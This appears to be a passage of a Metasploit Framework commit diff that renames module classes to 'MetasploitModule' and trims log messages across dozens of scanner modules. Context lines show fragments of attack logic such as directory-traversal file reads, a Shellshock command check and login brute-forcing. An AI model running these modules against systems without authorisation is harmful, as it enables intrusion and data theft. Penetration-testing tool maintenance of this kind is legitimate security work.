-7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/db2/discovery.rb b/modules/auxiliary/scanner/db2/discovery.rb index 3b6aea526d..01dee58103 100644 --- a/modules/auxiliary/scanner/db2/discovery.rb +++ b/modules/auxiliary/scanner/db2/discovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb index f99da3d29f..f451ba0dbc 100644 --- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb +++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 79c2b359f7..379d331e20 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index 753450426a..fc84d4d9b8 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index 2641054b1f..38e1786a8a 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb index d8f2d437cb..2bbea57cc3 100644 --- a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb +++ b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb @@ -8,7 +8,7 @@ require 'rex/proto/dcerpc' require 'rex/proto/dcerpc/wdscp' require 'rex/parser/unattend' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/dect/call_scanner.rb b/modules/auxiliary/scanner/dect/call_scanner.rb index 12c88f72f6..b47d050977 100644 --- a/modules/auxiliary/scanner/dect/call_scanner.rb +++ b/modules/auxiliary/scanner/dect/call_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::DECT_COA diff --git a/modules/auxiliary/scanner/dect/station_scanner.rb b/modules/auxiliary/scanner/dect/station_scanner.rb index cd1bf10cc4..532833e54d 100644 --- a/modules/auxiliary/scanner/dect/station_scanner.rb +++ b/modules/auxiliary/scanner/dect/station_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::DECT_COA diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 50df7747c8..1f981c1dce 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/discovery/empty_udp.rb b/modules/auxiliary/scanner/discovery/empty_udp.rb index d64ec3ebd8..378d9e69f7 100644 --- a/modules/auxiliary/scanner/discovery/empty_udp.rb +++ b/modules/auxiliary/scanner/discovery/empty_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index 4795a21ae8..52d730b0c1 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Exploit::Remote::Ipv6 diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index c60d28db3a..48fadda6c6 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ipv6 include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 08e6967dfe..2d6f9f71d1 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Exploit::Remote::Ipv6 @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary the host portion of the IPv6 address. Use NDP host solicitation to determine if the IP address is valid' }, - 'Author' => 'wuntee', + 'Author' => ['wuntee', 'd0lph1n98'], 'License' => MSF_LICENSE, 'References' => [ @@ -33,20 +33,22 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('TIMEOUT_NEIGHBOR', [true, "Time (seconds) to listen for a solicitation response.", 1]) ], self.class) - register_advanced_options( - [ - OptString.new('PREFIX', [true, "Prefix that each host should get an IPv6 address from", - "2001:1234:DEAD:BEEF::"] - ) - ], self.class) - deregister_options('SNAPLEN', 'FILTER', 'RHOST', 'PCAPFILE') end + def generate_prefix() + max = 16 ** 4 + prefix = "2001:" + (0..2).each do + prefix << "%x:" % Random.rand(0..max) + end + return prefix << ':' + end + def listen_for_neighbor_solicitation(opts = {}) hosts = [] timeout = opts['TIMEOUT'] || datastore['TIMEOUT'] - prefix = opts['PREFIX'] || datastore['PREFIX'] + prefix = @prefix max_epoch = ::Time.now.to_i + timeout autoconf_prefix = IPAddr.new(prefix).to_string().slice(0..19) @@ -94,7 +96,7 @@ class Metasploit3 < Msf::Auxiliary smac = @smac shost = opts['SHOST'] || datastore['SHOST'] || ipv6_link_address lifetime = opts['LIFETIME'] || datastore['TIMEOUT'] - prefix = opts['PREFIX'] || datastore['PREFIX'] + prefix = @prefix plen = 64 dmac = "33:33:00:00:00:01" @@ -141,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary checksum = 0 hop_limit = 0 flags = 0x08 - lifetime = 1800 + lifetime = 0 reachable = 0 retrans = 0 [type, code, checksum, hop_limit, flags, @@ -152,6 +154,7 @@ class Metasploit3 < Msf::Auxiliary # Start capture open_pcap({'FILTER' => "icmp6"}) + @prefix = generate_prefix() @netifaces = true if not netifaces_implemented? print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available") diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index 152f3c7374..95363cd2b8 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index e8222d1e05..df8b24781e 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb index 405e6e1851..9490798336 100644 --- a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb +++ b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'socket' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -51,14 +51,14 @@ class Metasploit3 < Msf::Auxiliary # Called when using check def check_host(_ip) - print_status("#{peer}: Checking for DLSw information disclosure (CVE-2014-7992)") + print_status("Checking for DLSw information disclosure (CVE-2014-7992)") response = get_response if response.blank? - vprint_status("#{peer}: no response") + vprint_status("No response") Exploit::CheckCode::Safe elsif response[0..1] == "\x31\x48" || response[0..1] == "\x32\x48" - vprint_good("#{peer}: Detected DLSw protocol") + vprint_good("Detected DLSw protocol") report_service( host: rhost, port: rport, @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary # TODO: check that response has something that truly indicates it is vulnerable # and not simply that it responded unless response[18..72].scan(/\x00/).length == 54 - print_good("#{peer}: vulnerable to DLSw information disclosure; leaked #{response.length} bytes") + print_good("Vulnerable to DLSw information disclosure; leaked #{response.length} bytes") report_vuln( host: rhost, port: rport, @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary Exploit::CheckCode::Vulnerable end else - vprint_status("#{peer}: #{response.size}-byte response didn't contain any leaked data") + vprint_status("#{response.size}-byte response didn't contain any leaked data") Exploit::CheckCode::Safe end end @@ -105,6 +105,6 @@ class Metasploit3 < Msf::Auxiliary 'DLSw_leaked_data', 'DLSw packet memory leak' ) - print_status("#{peer}: DLSw leaked data stored in #{path}") + print_status("DLSw leaked data stored in #{path}") end end diff --git a/modules/auxiliary/scanner/dns/dns_amp.rb b/modules/auxiliary/scanner/dns/dns_amp.rb index 4b448dca11..a914489225 100644 --- a/modules/auxiliary/scanner/dns/dns_amp.rb +++ b/modules/auxiliary/scanner/dns/dns_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb index 1dca83d949..50b9b0af01 100644 --- a/modules/auxiliary/scanner/elasticsearch/indices_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/indices_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -32,14 +32,14 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Querying indices...") + vprint_status("Querying indices...") begin res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable - vprint_error("#{peer} - Unable to establish connection") + vprint_error("Unable to establish connection") return end @@ -47,11 +47,11 @@ class Metasploit3 < Msf::Auxiliary begin json_body = JSON.parse(res.body) rescue JSON::ParserError - vprint_error("#{peer} - Unable to parse JSON") + vprint_error("Unable to parse JSON") return end else - vprint_error("#{peer} - Timeout or unexpected response...") + vprint_error("Timeout or unexpected response...") return end @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary end if indices.length > 0 - print_good("#{peer} - ElasticSearch Indices found: #{indices.join(", ")}") + print_good("ElasticSearch Indices found: #{indices.join(", ")}") end end diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index 98234fe2f9..89645436c3 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index 57e3e108e0..4570b9ab79 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index e95315b367..66f081533c 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index 8af1e9cf16..faeed16eb4 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb index 4970ab3c62..33b9c7c7a2 100644 --- a/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 676ea23753..2ee8ac7b82 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb +++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/ftp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/ftp_version.rb b/modules/auxiliary/scanner/ftp/ftp_version.rb index e922b36249..60cb5e1ec6 100644 --- a/modules/auxiliary/scanner/ftp/ftp_version.rb +++ b/modules/auxiliary/scanner/ftp/ftp_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb index deceef291b..29163236d5 100644 --- a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb index bcdb39565b..6743f9008f 100644 --- a/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index c29b0bb930..fd22f8a66b 100644 --- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index 56008ba45a..bded8208c7 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb index 6f80a86707..1a83f8a512 100644 --- a/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" fname = datastore['FILE'] - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 500 and res.body =~ /Error report/ - vprint_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") + vprint_error("Cannot obtain '#{fname}', here are some possible reasons:") vprint_error("\t1. File does not exist.") vprint_error("\t2. The server does not have any patches deployed.") vprint_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -88,11 +88,11 @@ class Metasploit3 < Msf::Auxiliary fname ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") elsif res and res.code == 404 and res.body.to_s =~ /The requested URL.*was not found/ - vprint_error("#{peer} - File not found. Check FILE.") + vprint_error("File not found. Check FILE.") else - vprint_error("#{peer} - Fail to obtain file for some unknown reason") + vprint_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb index bb63c2a7d3..af7ce9b7a4 100644 --- a/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb +++ b/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index e801a16c18..0b4fd6e2ea 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb b/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb index ab1cdd947e..eb22d9335e 100644 --- a/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb +++ b/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb index b5d88ff665..4bb3bece15 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb index fff6aa5d95..a5b43f7e2c 100644 --- a/modules/auxiliary/scanner/http/apache_activemq_traversal.rb +++ b/modules/auxiliary/scanner/http/apache_activemq_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index 6c0b87c217..6324d1152b 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -93,7 +93,7 @@ class Metasploit4 < Msf::Auxiliary res = req(datastore['CMD'], datastore['CVE']) if res && res.body =~ /#{marker}(.+)#{marker}/m - print_good("#{peer} - #{$1}") + print_good("#{$1}") report_vuln( :host => ip, :port => rport, diff --git a/modules/auxiliary/scanner/http/apache_userdir_enum.rb b/modules/auxiliary/scanner/http/apache_userdir_enum.rb index 483f7acb5d..2b4711af17 100644 --- a/modules/auxiliary/scanner/http/apache_userdir_enum.rb +++ b/modules/auxiliary/scanner/http/apache_userdir_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/appletv_login.rb b/modules/auxiliary/scanner/http/appletv_login.rb index d2c30f1bf1..16265f428e 100644 --- a/modules/auxiliary/scanner/http/appletv_login.rb +++ b/modules/auxiliary/scanner/http/appletv_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/http' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb index 78ee78a383..00f2f307f0 100644 --- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb +++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/axis_local_file_include.rb b/modules/auxiliary/scanner/http/axis_local_file_include.rb index c4c029987c..a788774b35 100644 --- a/modules/auxiliary/scanner/http/axis_local_file_include.rb +++ b/modules/auxiliary/scanner/http/axis_local_file_include.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/axis_login.rb b/modules/auxiliary/scanner/http/axis_login.rb index c806a5df43..cd70c330f3 100644 --- a/modules/auxiliary/scanner/http/axis_login.rb +++ b/modules/auxiliary/scanner/http/axis_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/axis2' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/backup_file.rb b/modules/auxiliary/scanner/http/backup_file.rb index 3ac0d740bb..226d7f4f90 100644 --- a/modules/auxiliary/scanner/http/backup_file.rb +++ b/modules/auxiliary/scanner/http/backup_file.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index af42fa9fa9..15bee576e6 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index 21e93ce9b1..baa635fe7e 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary fname = datastore['FILE'] fname = fname[1, fname.length] if fname =~ /^\// - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /failed to open stream\: No such file/ - print_error("#{peer} - Cannot read '#{fname}'. File does not exist.") + print_error("Cannot read '#{fname}'. File does not exist.") elsif res and res.code == 200 and res.body =~ /failed to open stream\: Permission denied/ - print_error("#{peer} - Cannot read '#{fname}'. Permission denied.") + print_error("Cannot read '#{fname}'. Permission denied.") elsif res and res.code == 200 and res.body =~ /Failed opening required/ - print_error("#{peer} - Cannot read '#{fname}'. Possibly not vulnerable.") + print_error("Cannot read '#{fname}'. Possibly not vulnerable.") elsif res and res.code == 200 data = res.body @@ -86,10 +86,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{datastore['FILE']} stored as '#{p}'") + print_good("#{datastore['FILE']} stored as '#{p}'") else - print_error("#{peer} - Request failed due to some unknown reason") + print_error("Request failed due to some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/blind_sql_query.rb b/modules/auxiliary/scanner/http/blind_sql_query.rb index 4903073c2a..8ef7274949 100644 --- a/modules/auxiliary/scanner/http/blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/blind_sql_query.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb b/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb index b24065de3a..f484a2a75f 100644 --- a/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb +++ b/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include 